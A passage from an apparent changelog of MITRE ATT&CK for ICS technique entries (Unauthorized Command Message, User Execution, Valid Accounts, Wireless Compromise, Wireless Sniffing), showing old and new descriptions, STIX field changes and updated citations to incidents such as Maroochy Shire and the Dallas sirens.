common in systems where a remotely managed asset is not feasible, external connections for remote access do not exist, or 3rd party contractor/vendor access is required. Adversaries may take advantage of transient assets in different ways. For instance, adversaries may target a transient asset when it is connected to an external network and then leverage its trusted access in another environment to launch an attack. They may also take advantage of installed applications and libraries that are used by legitimate end-users to interact with control system devices. Transient assets, in some cases, may not be deployed with a secure configuration leading to weaknesses that could allow an adversary to propagate malicious executable code, e.g., the transient asset may be infected by malware and when connected to an ICS environment the malware propagates onto other systems. In the Maroochy Shire attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.(Citation: Marshall Abrams July 2008)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0864https://attack.mitre.org/techniques/T0864
external_references[1]['source_name']NERC June 2021Marshall Abrams July 2008
external_references[1]['description'] North American Electric Reliability Corporation. (2021, June 28). Glossary of Terms Used in NERC Reliability Standards. Retrieved October 11, 2021.Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27
external_references[1]['url']https://www.nerc.com/files/glossary_of_terms.pdfhttps://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
external_references[2]['source_name']Maroochy - MITRE - 200808North American Electric Reliability Corporation June 2021
external_references[2]['description']Marshall Abrams. (2008, July 23). Malicious Control System Cyber Security Attack Case Study– Maroochy Water Services, Australia. Retrieved March 27, 2018.North American Electric Reliability Corporation 2021, June 28 Glossary of Terms Used in NERC Reliability Standards Retrieved. 2021/10/11
external_references[2]['url']https://www.mitre.org/sites/default/files/pdf/08%201145.pdfhttps://www.nerc.com/files/glossary_of_terms.pdf
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'NIST Apr 2013', 'description': 'National Institute of Standards and Technology. (2013, April). Security and Privacy Controls for Federal Information Systems and Organizations. Retrieved September 17, 2020.', 'url': 'https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf'}
external_references{'source_name': 'NAFT Dec 2019', 'description': 'North America Transmission Forum. (2019, December). NATF Transient Cyber Asset Guidance. Retrieved September 25, 2020.', 'url': 'https://www.natf.net/docs/natf/documents/resources/security/natf-transient-cyber-asset-guidance.pdf'}
external_references{'source_name': 'Emerson Exchange', 'description': 'Emerson Exchange. (n.d.). Increase Security with TPM, Secure Boot, and Trusted Boot. Retrieved September 25, 2020.', 'url': 'https://emersonexchange365.com/products/control-safety-systems/f/plc-pac-systems-industrial-computing-forum/8383/increase-security-with-tpm-secure-boot-and-trusted-boot'}
external_references{'source_name': 'National Security Agency Feb 2016', 'description': 'National Security Agency. (2016, February). Position Zero: Integrity Checking Windows-Based ICS/SCADA Systems. Retrieved September 25, 2020.', 'url': 'https://apps.nsa.gov/iaarchive/library/ia-guidance/security-configuration/industrial-control-systems/position-zero-integrity-checking-windows-based-ics-scada-systems.cfm'}

[T0855] Unauthorized Command Message

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may send unauthorized command messages to instrut1Adversaries may send unauthorized command messages to instru
>ct control system assets to perform actions outside of their>ct control system assets to perform actions outside of their
> intended functionality, or without the logical precondition> intended functionality, or without the logical precondition
>s to trigger their expected function. Command messages are u>s to trigger their expected function. Command messages are u
>sed in ICS networks to give direct instructions to control s>sed in ICS networks to give direct instructions to control s
>ystems devices. If an adversary can send an unauthorized com>ystems devices. If an adversary can send an unauthorized com
>mand message to a control system, then it can instruct the c>mand message to a control system, then it can instruct the c
>ontrol systems device to perform an action outside the norma>ontrol systems device to perform an action outside the norma
>l bounds of the device's actions. An adversary could potenti>l bounds of the device's actions. An adversary could potenti
>ally instruct a control systems device to perform an action >ally instruct a control systems device to perform an action 
>that will cause an Impact. (Citation: Research - Research - >that will cause an [Impact](https://attack.mitre.org/tactics
>Taxonomy Cyber Attacks on SCADA) In the Maroochy Attack, the>/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sas
> adversary used a dedicated analog two-way radio system to s>try 2011 In the Maroochy Shire attack, the adversary used 
>end false data and instructions to pumping stations and the >a dedicated analog two-way radio system to send false data a
>central computer. (Citation: Maroochy - MITRE - 200808) In t>nd instructions to pumping stations and the central computer
>he Dallas Siren incident, adversaries were able to send comm>.(Citation: Marshall Abrams July 2008)  In the Dallas Siren 
>and messages to activate tornado alarm systems across the ci>incident, adversaries were able to send command messages to 
>ty without an impending tornado or other disaster. (Citation>activate tornado alarm systems across the city without an im
>:ZDNet Dallas April 2017) (Citation:StateScoop Dallas March >pending tornado or other disaster. (Citation: Zack Whittaker
>2019)> April 2017) (Citation: Benjamin Freed March 2019)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-10-20 18:10:48.892000+00:00
descriptionAdversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an Impact. (Citation: Research - Research - Taxonomy Cyber Attacks on SCADA) In the Maroochy Attack, the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer. (Citation: Maroochy - MITRE - 200808) In the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster. (Citation:ZDNet Dallas April 2017) (Citation:StateScoop Dallas March 2019)Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) In the Maroochy Shire attack, the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer.(Citation: Marshall Abrams July 2008) In the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster. (Citation: Zack Whittaker April 2017) (Citation: Benjamin Freed March 2019)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0855https://attack.mitre.org/techniques/T0855
external_references[1]['source_name']StateScoop Dallas March 2019Benjamin Freed March 2019
external_references[1]['description']Benjamin Freed. (2019, March 13). Tornado sirens in Dallas suburbs deactivated after being hacked and set off. Retrieved November 6, 2020.Benjamin Freed 2019, March 13 Tornado sirens in Dallas suburbs deactivated after being hacked and set off Retrieved. 2020/11/06
external_references[2]['source_name']Research - Research - Taxonomy Cyber Attacks on SCADABonnie Zhu, Anthony Joseph, Shankar Sastry 2011
external_references[2]['description']Bonnie Zhu, Anthony Joseph, Shankar Sastry. (2011). A Taxonomy of Cyber Attacks on SCADA Systems. Retrieved January 12, 2018.Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12
external_references[3]['source_name']Ukraine15 - EISAC - 201603Marshall Abrams July 2008
external_references[3]['description']Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems. (2016, March 18). Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case. Retrieved March 27, 2018.Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27
external_references[3]['url']https://ics.sans.org/media/E-ISAC%20SANS%20Ukraine%20DUC%205.pdfhttps://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
external_references[4]['source_name']Maroochy - MITRE - 200808Zack Whittaker April 2017
external_references[4]['description']Marshall Abrams. (2008, July 23). Malicious Control System Cyber Security Attack Case Study– Maroochy Water Services, Australia. Retrieved March 27, 2018.Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06
external_references[4]['url']https://www.mitre.org/sites/default/files/pdf/08%201145.pdfhttps://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'ZDNet Dallas April 2017', 'description': "Zack Whittaker. (2017, April 12). Dallas' emergency sirens were hacked with a rogue radio signal. Retrieved November 6, 2020.", 'url': 'https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/'}

[T0863] User Execution

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may rely on a targeted organizations' user intert1Adversaries may rely on a targeted organizations user intera
>action for the execution of malicious code. User interaction>ction for the execution of malicious code. User interaction 
> may consist of installing applications, opening email attac>may consist of installing applications, opening email attach
>hments, or granting higher permissions to documents.   Adver>ments, or granting higher permissions to documents.   Advers
>saries may embed malicious code or visual basic code into fi>aries may embed malicious code or visual basic code into fil
>les such as Microsoft Word and Excel documents or software i>es such as Microsoft Word and Excel documents or software in
>nstallers. (Citation: BlackEnergy - Booz Allen Hamilton) Exe>stallers. (Citation: Booz Allen Hamilton) Execution of this 
>cution of this code requires that the user enable scripting >code requires that the user enable scripting or write access
>or write access within the document. Embedded code may not a> within the document. Embedded code may not always be notice
>lways be noticeable to the user especially in cases of troja>able to the user especially in cases of trojanized software.
>nized software. (Citation: Havex - F-Secure) A Chinese spear> (Citation: Daavid Hentunen, Antti Tikkanen June 2014  A C
>phishing campaign running from December 9, 2011 through Febr>hinese spearphishing campaign running from December 9, 2011 
>uary 29, 2012 delivered malware through spearphishing attach>through February 29, 2012 delivered malware through spearphi
>ments which required user action to achieve execution.(Citat>shing attachments which required user action to achieve exec
>ion: CISA Chinese Gas Pipeline Intrusion 2011 - 2013 July 20>ution. (Citation: CISA AA21-201A Pipeline Intrusion July 202
>21)>1)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-27 16:03:41.333000+00:00
descriptionAdversaries may rely on a targeted organizations' user interaction for the execution of malicious code. User interaction may consist of installing applications, opening email attachments, or granting higher permissions to documents. Adversaries may embed malicious code or visual basic code into files such as Microsoft Word and Excel documents or software installers. (Citation: BlackEnergy - Booz Allen Hamilton) Execution of this code requires that the user enable scripting or write access within the document. Embedded code may not always be noticeable to the user especially in cases of trojanized software. (Citation: Havex - F-Secure) A Chinese spearphishing campaign running from December 9, 2011 through February 29, 2012 delivered malware through spearphishing attachments which required user action to achieve execution.(Citation: CISA Chinese Gas Pipeline Intrusion 2011 - 2013 July 2021)Adversaries may rely on a targeted organizations user interaction for the execution of malicious code. User interaction may consist of installing applications, opening email attachments, or granting higher permissions to documents. Adversaries may embed malicious code or visual basic code into files such as Microsoft Word and Excel documents or software installers. (Citation: Booz Allen Hamilton) Execution of this code requires that the user enable scripting or write access within the document. Embedded code may not always be noticeable to the user especially in cases of trojanized software. (Citation: Daavid Hentunen, Antti Tikkanen June 2014) A Chinese spearphishing campaign running from December 9, 2011 through February 29, 2012 delivered malware through spearphishing attachments which required user action to achieve execution. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0863https://attack.mitre.org/techniques/T0863
external_references[1]['source_name']BlackEnergy - Booz Allen HamiltonBooz Allen Hamilton
external_references[1]['description']Booz Allen Hamilton. (n.d.). When The Lights Went Out. Retrieved October 22, 2019.Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22
external_references[2]['source_name']Havex - F-SecureDaavid Hentunen, Antti Tikkanen June 2014
external_references[2]['description']Daavid Hentunen, Antti Tikkanen. (2014, June 23). Havex Hunts For ICS/SCADA Systems. Retrieved April 1, 2019.Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01
external_references[3]['source_name']CISA Chinese Gas Pipeline Intrusion 2011 - 2013 July 2021CISA AA21-201A Pipeline Intrusion July 2021
external_references[3]['description']ONG2011 - DHS Advisory - Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA). (2021, July 20). Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013. Retrieved October 8, 2021.Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08

[T0859] Valid Accounts

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may steal the credentials of a specific user or t1Adversaries may steal the credentials of a specific user or 
>service account using credential access techniques. In some >service account using credential access techniques. In some 
>cases, default credentials for control system devices may be>cases, default credentials for control system devices may be
> publicly available. Compromised credentials may be used to > publicly available. Compromised credentials may be used to 
>bypass access controls placed on various resources on hosts >bypass access controls placed on various resources on hosts 
>and within the network, and may even be used for persistent >and within the network, and may even be used for persistent 
>access to remote systems. Compromised and default credential>access to remote systems. Compromised and default credential
>s may also grant an adversary increased privilege to specifi>s may also grant an adversary increased privilege to specifi
>c systems and devices or access to restricted areas of the n>c systems and devices or access to restricted areas of the n
>etwork. Adversaries may choose not to use malware or tools, >etwork. Adversaries may choose not to use malware or tools, 
>in conjunction with the legitimate access those credentials >in conjunction with the legitimate access those credentials 
>provide, to make it harder to detect their presence or to co>provide, to make it harder to detect their presence or to co
>ntrol devices and send legitimate commands in an unintended >ntrol devices and send legitimate commands in an unintended 
>way. Adversaries may also create accounts, sometimes using p>way.   Adversaries may also create accounts, sometimes using
>redefined account names and passwords, to provide a means of> predefined account names and passwords, to provide a means 
> backup access for persistence.(Citation: BlackEnergy - Booz>of backup access for persistence. (Citation: Booz Allen Hami
> Allen Hamilton) The overlap of credentials and permissions >lton)   The overlap of credentials and permissions across a 
>across a network of systems is of concern because the advers>network of systems is of concern because the adversary may b
>ary may be able to pivot across accounts and systems to reac>e able to pivot across accounts and systems to reach a hig
>h a high level of access (i.e., domain or enterprise adminis>level of access (i.e., domain or enterprise administrator)  
>trator) and possibly between the enterprise and operational >and possibly between the enterprise and operational technolo
>technology environments. Adversaries may be able to leverage>gy environments. Adversaries may be able to leverage valid c
> valid credentials from one system to gain access to another>redentials from one system to gain access to another system.
> system. 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-27 16:35:12.478000+00:00
descriptionAdversaries may steal the credentials of a specific user or service account using credential access techniques. In some cases, default credentials for control system devices may be publicly available. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network, and may even be used for persistent access to remote systems. Compromised and default credentials may also grant an adversary increased privilege to specific systems and devices or access to restricted areas of the network. Adversaries may choose not to use malware or tools, in conjunction with the legitimate access those credentials provide, to make it harder to detect their presence or to control devices and send legitimate commands in an unintended way. Adversaries may also create accounts, sometimes using predefined account names and passwords, to provide a means of backup access for persistence.(Citation: BlackEnergy - Booz Allen Hamilton) The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) and possibly between the enterprise and operational technology environments. Adversaries may be able to leverage valid credentials from one system to gain access to another system.Adversaries may steal the credentials of a specific user or service account using credential access techniques. In some cases, default credentials for control system devices may be publicly available. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network, and may even be used for persistent access to remote systems. Compromised and default credentials may also grant an adversary increased privilege to specific systems and devices or access to restricted areas of the network. Adversaries may choose not to use malware or tools, in conjunction with the legitimate access those credentials provide, to make it harder to detect their presence or to control devices and send legitimate commands in an unintended way. Adversaries may also create accounts, sometimes using predefined account names and passwords, to provide a means of backup access for persistence. (Citation: Booz Allen Hamilton) The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) and possibly between the enterprise and operational technology environments. Adversaries may be able to leverage valid credentials from one system to gain access to another system.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0859https://attack.mitre.org/techniques/T0859
external_references[1]['source_name']Ukraine15 - EISAC - 201603Booz Allen Hamilton
external_references[1]['description']Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems. (2016, March 18). Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case. Retrieved March 27, 2018.Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22
external_references[1]['url']https://ics.sans.org/media/E-ISAC%20SANS%20Ukraine%20DUC%205.pdfhttps://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'BlackEnergy - Booz Allen Hamilton', 'description': 'Booz Allen Hamilton. (n.d.). When The Lights Went Out. Retrieved October 22, 2019.', 'url': 'https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf'}

[T0860] Wireless Compromise

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may perform wireless compromise as a method of gt1Adversaries may perform wireless compromise as a method of g
>aining communications and unauthorized access to a wireless >aining communications and unauthorized access to a wireless 
>network. Access to a wireless network may be gained through >network. Access to a wireless network may be gained through 
>the compromise of a wireless device. (Citation: ICSCorsair ->the compromise of a wireless device. (Citation: Alexander Bo
> Bolshev) (Citation: Hart - Bolshev) Adversaries may also ut>lshev, Gleb Cherbov July 2014) (Citation: Alexander Bolshev 
>ilize radios and other wireless communication devices on the>March 2014) Adversaries may also utilize radios and other wi
> same frequency as the wireless network. Wireless compromise>reless communication devices on the same frequency as the wi
> can be done as an initial access vector from a remote dista>reless network. Wireless compromise can be done as an initia
>nce.    A joint case study on the Maroochy Shire Water Servi>l access vector from a remote distance.   In the Maroochy Sh
>ces event examined the attack from a cyber security perspect>ire attack, the adversary used a two-way radio to communicat
>ive.  (Citation: Maroochy - MITRE - 200808) The adversary di>e with and set the frequencies of Maroochy Shire's repeater 
>srupted Maroochy Shire's radio-controlled sewage system by d>stations.(Citation: Marshall Abrams July 2008)  A Polish stu
>riving around with stolen radio equipment and issuing comman>dent used a modified TV remote controller to gain access to 
>ds with them. Boden used a two-way radio to communicate with>and control over the Lodz city tram system in Poland. (Citat
> and set the frequencies of Maroochy Shire's repeater statio>ion: John Bill May 2017) (Citation: Shelley Smith February 2
>ns.   A Polish student used a modified TV remote controller >008) The remote controller device allowed the student to int
>to gain access to and control over the Lodz city tram system>erface with the trams network to modify track settings and o
> in Poland. (Citation: LodzTram-LondonReconnections-2017-12)>verride operator control. The adversary may have accomplishe
> (Citation: LodzTram-InHomelandSecurity-2008-02) The remote >d this by aligning the controller to the frequency and ampli
>controller device allowed the student to interface with the >tude of IR control protocol signals. (Citation: Bruce Schnei
>tram’s network to modify track settings and override operato>er January 2008) The controller then enabled initial access 
>r control. The adversary may have accomplished this by align>to the network, allowing the capture and replay of tram sign
>ing the controller to the frequency and amplitude of IR cont>als. (Citation: John Bill May 2017)
>rol protocol signals. (Citation: LodzTram-Schneier-2008-01)  
>The controller then enabled initial access to the network, a 
>llowing the capture and replay of tram signals. (Citation: L 
>odzTram-LondonReconnections-2017-12) 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-10-20 20:40:16.860000+00:00
descriptionAdversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device. (Citation: ICSCorsair - Bolshev) (Citation: Hart - Bolshev) Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance. A joint case study on the Maroochy Shire Water Services event examined the attack from a cyber security perspective. (Citation: Maroochy - MITRE - 200808) The adversary disrupted Maroochy Shire's radio-controlled sewage system by driving around with stolen radio equipment and issuing commands with them. Boden used a two-way radio to communicate with and set the frequencies of Maroochy Shire's repeater stations. A Polish student used a modified TV remote controller to gain access to and control over the Lodz city tram system in Poland. (Citation: LodzTram-LondonReconnections-2017-12) (Citation: LodzTram-InHomelandSecurity-2008-02) The remote controller device allowed the student to interface with the tram’s network to modify track settings and override operator control. The adversary may have accomplished this by aligning the controller to the frequency and amplitude of IR control protocol signals. (Citation: LodzTram-Schneier-2008-01) The controller then enabled initial access to the network, allowing the capture and replay of tram signals. (Citation: LodzTram-LondonReconnections-2017-12)Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device. (Citation: Alexander Bolshev, Gleb Cherbov July 2014) (Citation: Alexander Bolshev March 2014) Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance. In the Maroochy Shire attack, the adversary used a two-way radio to communicate with and set the frequencies of Maroochy Shire's repeater stations.(Citation: Marshall Abrams July 2008) A Polish student used a modified TV remote controller to gain access to and control over the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) The remote controller device allowed the student to interface with the trams network to modify track settings and override operator control. The adversary may have accomplished this by aligning the controller to the frequency and amplitude of IR control protocol signals. (Citation: Bruce Schneier January 2008) The controller then enabled initial access to the network, allowing the capture and replay of tram signals. (Citation: John Bill May 2017)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0860https://attack.mitre.org/techniques/T0860
external_references[1]['source_name']Hart - BolshevAlexander Bolshev March 2014
external_references[1]['description']Alexander Bolshev. (2014, March 11). S4x14: HART As An Attack Vector. Retrieved January 5, 2020.Alexander Bolshev 2014, March 11 S4x14: HART As An Attack Vector Retrieved. 2020/01/05
external_references[2]['source_name']ICSCorsair - BolshevAlexander Bolshev, Gleb Cherbov July 2014
external_references[2]['description']Alexander Bolshev, Gleb Cherbov. (2014, July 08). ICSCorsair: How I will PWN your ERP through 4-20 mA current loop. Retrieved January 5, 2020.Alexander Bolshev, Gleb Cherbov 2014, July 08 ICSCorsair: How I will PWN your ERP through 4-20 mA current loop Retrieved. 2020/01/05
external_references[3]['source_name']LodzTram-InHomelandSecurity-2008-02Bruce Schneier January 2008
external_references[3]['description']Shelley Smith. (2008, February 12). Teen Hacker in Poland Plays Trains and Derails City Tram System. Retrieved October 17, 2019.Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17
external_references[3]['url']https://inhomelandsecurity.com/teen%20hacker%20in%20poland%20plays%20tr/https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html
external_references[4]['source_name']LodzTram-LondonReconnections-2017-12John Bill May 2017
external_references[4]['description']John Bill. (2017, May 12). Hacked Cyber Security Railways. Retrieved October 17, 2019.John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 2019/10/17
external_references[5]['source_name']LodzTram-Schneier-2008-01Marshall Abrams July 2008
external_references[5]['description']Bruce Schneier. (2008, January 17). Hacking Polish Trams. Retrieved October 17, 2019.Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27
external_references[5]['url']https://www.schneier.com/blog/archives/2008/01/hacking%20the%20pol.htmlhttps://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
external_references[6]['source_name']Maroochy - MITRE - 200808Shelley Smith February 2008
external_references[6]['description']Marshall Abrams. (2008, July 23). Malicious Control System Cyber Security Attack Case Study– Maroochy Water Services, Australia. Retrieved March 27, 2018.Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17
external_references[6]['url']https://www.mitre.org/sites/default/files/pdf/08%201145.pdfhttps://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/

[T0887] Wireless Sniffing

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may seek to capture radio frequency (RF) communit1Adversaries may seek to capture radio frequency (RF) communi
>cation used for remote control and reporting in distributed >cation used for remote control and reporting in distributed 
>environments. RF communication frequencies vary between 3 kH>environments. RF communication frequencies vary between 3 kH
>z to 300 GHz, although are commonly between 300 MHz to 6 GHz>z to 300 GHz, although are commonly between 300 MHz to 6 GHz
>. The wavelength and frequency of the signal affect how the >(Citation: Candell, R., Hany, M., Lee, K. B., Liu,Y., Quim
>signal propagates through open air, obstacles (e.g. walls an>by, J., Remley, K. April 2018)  The wavelength and frequency
>d trees) and the type of radio required to capture them. The> of the signal affect how the signal propagates through open
>se characteristics are often standardized in the protocol an> air, obstacles (e.g. walls and trees) and the type of radio
>d hardware and may have an effect on how the signal is captu> required to capture them. These characteristics are often s
>red. Some examples of wireless protocols that may be found i>tandardized in the protocol and hardware and may have an eff
>n cyber-physical environments are: WirelessHART, Zigbee, WIA>ect on how the signal is captured. Some examples of wireless
>-FA, and 700 MHz Public Safety Spectrum. Adversaries may cap> protocols that may be found in cyber-physical environments 
>ture RF communications by using specialized hardware, such a>are: WirelessHART, Zigbee, WIA-FA, and 700 MHz Public Safety
>s software defined radio (SDR), handheld radio, or a compute> Spectrum.   Adversaries may capture RF communications by us
>r with radio demodulator tuned to the communication frequenc>ing specialized hardware, such as software defined radio (SD
>y. Information transmitted over a wireless medium may be cap>R), handheld radio, or a computer with radio demodulator tun
>tured in-transit whether the sniffing device is the intended>ed to the communication frequency. (Citation: Bastille April
> destination or not. This technique may be particularly usef> 2017) Information transmitted over a wireless medium may be
>ul to an adversary when the communications are not encrypted> captured in-transit whether the sniffing device is the inte
>. In the 2017 Dallas Siren incident, it is suspected that ad>nded destination or not. This technique may be particularly 
>versaries likely captured wireless command message broadcast>useful to an adversary when the communications are not encry
>s on a 700 MHz frequency during a regular test of the system>pted. (Citation: Gallagher, S. April 2017)   In the 2017 Dal
>. These messages were later replayed to trigger the alarm sy>las Siren incident, it is suspected that adversaries likely 
>stems.>captured wireless command message broadcasts on a 700 MHz fr
 >equency during a regular test of the system. These messages 
 >were later replayed to trigger the alarm systems. (Citation:
 > Gallagher, S. April 2017)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 19:03:26.506000+00:002022-09-27 17:37:02.773000+00:00
descriptionAdversaries may seek to capture radio frequency (RF) communication used for remote control and reporting in distributed environments. RF communication frequencies vary between 3 kHz to 300 GHz, although are commonly between 300 MHz to 6 GHz. The wavelength and frequency of the signal affect how the signal propagates through open air, obstacles (e.g. walls and trees) and the type of radio required to capture them. These characteristics are often standardized in the protocol and hardware and may have an effect on how the signal is captured. Some examples of wireless protocols that may be found in cyber-physical environments are: WirelessHART, Zigbee, WIA-FA, and 700 MHz Public Safety Spectrum. Adversaries may capture RF communications by using specialized hardware, such as software defined radio (SDR), handheld radio, or a computer with radio demodulator tuned to the communication frequency. Information transmitted over a wireless medium may be captured in-transit whether the sniffing device is the intended destination or not. This technique may be particularly useful to an adversary when the communications are not encrypted. In the 2017 Dallas Siren incident, it is suspected that adversaries likely captured wireless command message broadcasts on a 700 MHz frequency during a regular test of the system. These messages were later replayed to trigger the alarm systems.Adversaries may seek to capture radio frequency (RF) communication used for remote control and reporting in distributed environments. RF communication frequencies vary between 3 kHz to 300 GHz, although are commonly between 300 MHz to 6 GHz. (Citation: Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. April 2018) The wavelength and frequency of the signal affect how the signal propagates through open air, obstacles (e.g. walls and trees) and the type of radio required to capture them. These characteristics are often standardized in the protocol and hardware and may have an effect on how the signal is captured. Some examples of wireless protocols that may be found in cyber-physical environments are: WirelessHART, Zigbee, WIA-FA, and 700 MHz Public Safety Spectrum. Adversaries may capture RF communications by using specialized hardware, such as software defined radio (SDR), handheld radio, or a computer with radio demodulator tuned to the communication frequency. (Citation: Bastille April 2017) Information transmitted over a wireless medium may be captured in-transit whether the sniffing device is the intended destination or not. This technique may be particularly useful to an adversary when the communications are not encrypted. (Citation: Gallagher, S. April 2017) In the 2017 Dallas Siren incident, it is suspected that adversaries likely captured wireless command message broadcasts on a 700 MHz frequency during a regular test of the system. These 